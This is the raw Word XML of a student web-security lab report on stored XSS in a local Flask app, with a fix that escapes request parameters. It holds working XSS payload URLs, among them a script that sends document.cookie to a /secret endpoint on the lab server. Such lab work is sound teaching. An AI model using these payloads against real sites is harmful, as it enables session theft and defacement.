    <w:p w14:paraId="484DAB94" w14:textId="66BC1BF6" w:rsidR="001163A0" w:rsidRDefault="001163A0" w:rsidP="00A233EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5989AC58" w14:textId="2DE7B112" w:rsidR="001163A0" w:rsidRDefault="001163A0" w:rsidP="00A233EC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(more code…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80C12E" w14:textId="627FB9AE" w:rsidR="001163A0" w:rsidRDefault="001163A0" w:rsidP="00A233EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59033C59" w14:textId="0CE8D48C" w:rsidR="001163A0" w:rsidRDefault="001163A0" w:rsidP="00A233EC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3EA52D76" w14:textId="77777777" w:rsidR="00C432F3" w:rsidRPr="00CF0327" w:rsidRDefault="001163A0" w:rsidP="00C432F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4 (Stored)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56907011" w14:textId="1258AD94" w:rsidR="00097164" w:rsidRDefault="00C432F3" w:rsidP="00041C9B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upon inspection, we discover that both parameters of the /add API are vulnerable to stored XSS, as they are not sanitized. This means we can add HTML, JS or CSS as much as we want inside the database</w:t>
      </w:r>
      <w:r w:rsidR="006C532C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it will be displayed as such when the /stations API is invoked. We can try to spook users by adding the usual alert </w:t>
      </w:r>
      <w:r w:rsidR="00041C9B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>telling them about the presence of a virus of some kind. The string used is the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F07C6FA" w14:textId="77777777" w:rsidR="00041C9B" w:rsidRDefault="00041C9B" w:rsidP="00041C9B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646297CB" w14:textId="18696695" w:rsidR="00097164" w:rsidRDefault="00097164" w:rsidP="00097164">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1AE4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F1AE4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F1AE4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=10000&amp;location=&lt;script&gt;alert("You have a virus!!!!!!")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61626949" w14:textId="3B6E2260" w:rsidR="00041C9B" w:rsidRPr="006F1AE4" w:rsidRDefault="00041C9B" w:rsidP="00097164">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is the full URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137B20A" w14:textId="38CB988B" w:rsidR="006F1AE4" w:rsidRDefault="007F165B" w:rsidP="00097164">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00041C9B" w:rsidRPr="0085776B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/add?id=10000&amp;location=%3Cscript%3Ealert(%22You%20have%20a%20virus!!!!!!%22)%3C/script%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3524C2B3" w14:textId="35E72CC9" w:rsidR="00041C9B" w:rsidRPr="006F1AE4" w:rsidRDefault="00041C9B" w:rsidP="00097164">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is what happens once the above URL is executed and the stations page is visited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40409A5C" w14:textId="6EC52DEB" w:rsidR="00097164" w:rsidRDefault="00097164" w:rsidP="00F844B3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097164">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F587C10" wp14:editId="32F5873D">
            <wp:extent cx="1203252" cy="1047877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6562" cy="10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C9B" w:rsidRPr="00F844B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D7F8D81" wp14:editId="7F457487">
            <wp:extent cx="4776375" cy="1042199"/>
            <wp:effectExtent l="0" t="0" r="5715" b="571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3465" cy="10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B04C" w14:textId="004C33FA" w:rsidR="00F844B3" w:rsidRDefault="001B247F" w:rsidP="001163A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The fix is identical to all other three exercises</w:t>
      </w:r>
      <w:r w:rsidR="00B76154">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: using the escape() function. It must be highlighted how this implementation is also potentially </w:t>
      </w:r>
      <w:r w:rsidR="00315FFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerable to SQL injection,</w:t>
      </w:r>
      <w:r w:rsidR="00D81576">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is also fixed by using the escape function as it additionally encodes quotes</w:t>
      </w:r>
      <w:r w:rsidR="005D636D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The following is the edit made to the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580ED59A" w14:textId="4C256171" w:rsidR="000D3E96" w:rsidRPr="005D636D" w:rsidRDefault="000D3E96" w:rsidP="005D636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5118067D" w14:textId="220FE967" w:rsidR="000D3E96" w:rsidRPr="005D636D" w:rsidRDefault="000D3E96" w:rsidP="005D636D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(line 44)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD6EE1" w14:textId="77777777" w:rsidR="00315FFB" w:rsidRPr="005D636D" w:rsidRDefault="00315FFB" w:rsidP="005D636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5D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = escape(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request.args.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('id'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779E3D7" w14:textId="20DFFB18" w:rsidR="000D3E96" w:rsidRDefault="00315FFB" w:rsidP="005D636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5D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>location = escape(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request.args.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D636D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('location'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084DAC7B" w14:textId="77777777" w:rsidR="005D636D" w:rsidRDefault="005D636D" w:rsidP="005D636D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5B619D9D" w14:textId="22E40969" w:rsidR="00D81576" w:rsidRPr="005D636D" w:rsidRDefault="005D636D" w:rsidP="00315FFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some examples of inserted data being escaped by this code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC2AD1" w14:textId="1609E7B8" w:rsidR="00D81576" w:rsidRDefault="00D81576" w:rsidP="00315FFB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8157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BC96445" wp14:editId="238BE2E9">
            <wp:extent cx="6120130" cy="450215"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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38D1" w14:textId="77777777" w:rsidR="00BF62CF" w:rsidRPr="001163A0" w:rsidRDefault="00BF62CF" w:rsidP="00315FFB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BF62CF" w:rsidRPr="001163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27"/>
    <w:rsid w:val="000007EF"/>
    <w:rsid w:val="00025960"/>
    <w:rsid w:val="00041C9B"/>
    <w:rsid w:val="000440EB"/>
    <w:rsid w:val="00097164"/>
    <w:rsid w:val="000A5C78"/>
    <w:rsid w:val="000A6E1A"/>
    <w:rsid w:val="000D3E96"/>
    <w:rsid w:val="001163A0"/>
    <w:rsid w:val="001745F3"/>
    <w:rsid w:val="00197F6E"/>
    <w:rsid w:val="001B247F"/>
    <w:rsid w:val="00315FFB"/>
    <w:rsid w:val="003A3748"/>
    <w:rsid w:val="003E22B8"/>
    <w:rsid w:val="00423FBC"/>
    <w:rsid w:val="00463475"/>
    <w:rsid w:val="004740B5"/>
    <w:rsid w:val="004B059E"/>
    <w:rsid w:val="004E7D7A"/>
    <w:rsid w:val="005903BE"/>
    <w:rsid w:val="0059565A"/>
    <w:rsid w:val="005B4164"/>
    <w:rsid w:val="005D636D"/>
    <w:rsid w:val="00693E1C"/>
    <w:rsid w:val="006C532C"/>
    <w:rsid w:val="006E036D"/>
    <w:rsid w:val="006F1AE4"/>
    <w:rsid w:val="00705B26"/>
    <w:rsid w:val="007F165B"/>
    <w:rsid w:val="008A272B"/>
    <w:rsid w:val="008C547A"/>
    <w:rsid w:val="008C65E9"/>
    <w:rsid w:val="00912A71"/>
    <w:rsid w:val="009234A5"/>
    <w:rsid w:val="009326E0"/>
    <w:rsid w:val="009761A8"/>
    <w:rsid w:val="00A233EC"/>
    <w:rsid w:val="00A46619"/>
    <w:rsid w:val="00B76154"/>
    <w:rsid w:val="00BF62CF"/>
    <w:rsid w:val="00C3759F"/>
    <w:rsid w:val="00C432F3"/>
    <w:rsid w:val="00C50BED"/>
    <w:rsid w:val="00CD1191"/>
    <w:rsid w:val="00CF0327"/>
    <w:rsid w:val="00CF061D"/>
    <w:rsid w:val="00D21393"/>
    <w:rsid w:val="00D81576"/>
    <w:rsid w:val="00DC7BCB"/>
    <w:rsid w:val="00DE50D9"/>
    <w:rsid w:val="00E4569C"/>
    <w:rsid w:val="00EC7BE3"/>
    <w:rsid w:val="00F156DE"/>
    <w:rsid w:val="00F8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14F8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{85C2401B-A938-478B-8152-E6641CC5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A374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A374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A37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99.129:8080/WebGoat/start.mvc" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink2.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/hello?name=%22attribute=%22aaa%22%3ELink%3C/a%3E%3Cbutton%20onclick=%22alert(%27You%20have%20a%20virus%27)%22%3EClick%20me!%3C/button%3E%3Ca%20href=%2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127.0.0.1:5000/hello?name=%22attribute=%22aaa%22%3E%3C/a%3E%3Cscript%3Efetch(%22http://127.0.0.1:5000/secret?cookies=%22%2B%0Adocument.cookie).then(function(data)%7breturn%20data.text()%7d).then(function(data)%7bif%20(data%20==%20%27Congrats!%27)%7bconsole.log(%22Success%22)%7d%7d).catch(function(data)%7bconsole.log(%22failure%22)%7d)%3C/script%3E%3Ca%20href=%22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1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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://127.0.0.1:5000/add?id=10000&amp;location=%3Cscript%3Ealert(%22You%20have%20a%20virus!!!!!!%22)%3C/script%3E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7T09:56:20.63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143 0 4736,'-18'3'1114,"1"1"0,0 0 0,-20 9 0,5-2 2691,31-11-3660,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,1 0-1,-1 1 1,0 0-1,2-1-64,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,10 6 247,1-1 1,0-1-1,1-1 1,18 5-1,24 4 258,69 7-1,74-4 377,-189-16-913,211 11 852,48-4 6,1053-45 1893,-339-27-2321,-709 49-436,304 5-2789,-460 12 1055,-26-1 592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7T09:56:24.95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79 340 10368,'-6'12'8763,"3"9"-6076,2-16-2356,-17 95 1139,-6 50-1308,21-124-184,2 1 1,1 0 0,1-1-1,6 32 1,-6-54 20,0 1 0,1 0 0,-1-1 0,1 1 1,0-1-1,1 0 0,-1 1 0,1-1 0,-1 0 0,1-1 0,0 1 1,1 0-1,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,1-1 1,-1 0-1,7 3 0,4 0 10,0-1 1,1-1-1,-1 0 0,0-1 1,20 0-1,46 0-2259,94-8-1,-117 1 1152</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="469.17">26 819 10880,'-21'4'3509,"21"-4"-3488,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0-1 1,0 1-1,-1 0 149,1 0-149,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0 0-1,0-5 243,0 2-73,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1-1,2-6 1,4-1 210,-1 1 0,2-1 1,-1 1-1,1 0 0,13-9 0,48-29 700,-56 38-929,316-204 1647,-64 37-2958,1 4-8682,-176 115 3949,-10 10 2070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7T09:56:15.85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712 215 10112,'-6'-5'4672,"6"4"-4582,2-14 1805,-2-1 0,-1-16-1,1 26-1449,-1 0 1,0 0-1,-1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,-6-9 1,6 12-320,1 0 0,-1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1 0 1,0 0-1,-7-4 0,2 2 25,-4-3-34,-1 1 1,0 1-1,0 0 0,-24-6 1,15 7-76,1 0 1,-1 0 0,0 2-1,-27-1 1,23 3-53,1 1 1,0 0-1,0 2 0,-38 7 1,50-7-59,0 0-1,-1 1 1,2 1 0,-1 0 0,1 0-1,-1 1 1,2 1 0,-1 0-1,-11 8 1,17-10 1,0 0 0,1 1-1,-1 0 1,2-1 0,-1 2-1,1-1 1,-7 10 0,7-6-70,0 0 1,1 0-1,0 0 0,-3 15 1,4-8-11,1-1 0,0 1 0,3 29 0,14 45-204,-2-40 330,3-1 0,41 83-1,-38-96 130,2 0 1,28 34-1,-32-50-5,0-1 1,2 0 0,1-1-1,36 26 1,-34-30-45,1-1-1,25 12 1,-38-20-34,1-1-1,1 0 1,-1-1 0,1 0 0,0 0-1,0-1 1,1-1 0,-1 1 0,1-2 0,0 1-1,-1-1 1,1-1 0,19-1 0,-19 0 17,0 0 0,0-1 0,-1-1 0,1 0 0,18-6 0,-14 3 80,-1-1 0,30-17 0,-28 13-44,-2 0-1,0-1 0,0 0 1,-2-1-1,0-1 0,0 1 1,16-25-1,-14 17 13,-2-1-1,0-1 1,-2 0 0,-1 0 0,9-30 0,-14 35-28,-1 0 0,3-34 0,-8 28 0,-1 0 1,-5-25-1,3 31-137,-1-1 0,-1 1 1,-1 0-1,-1 1 0,-12-21 0,10 23-158,-1 0 1,-1 1-1,-1-1 0,-1 2 0,-28-25 1,16 19-408,-36-22 0,-22-6-159,76 43 744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Franzil</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Matteo Franzil</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-17T09:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-17T16:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>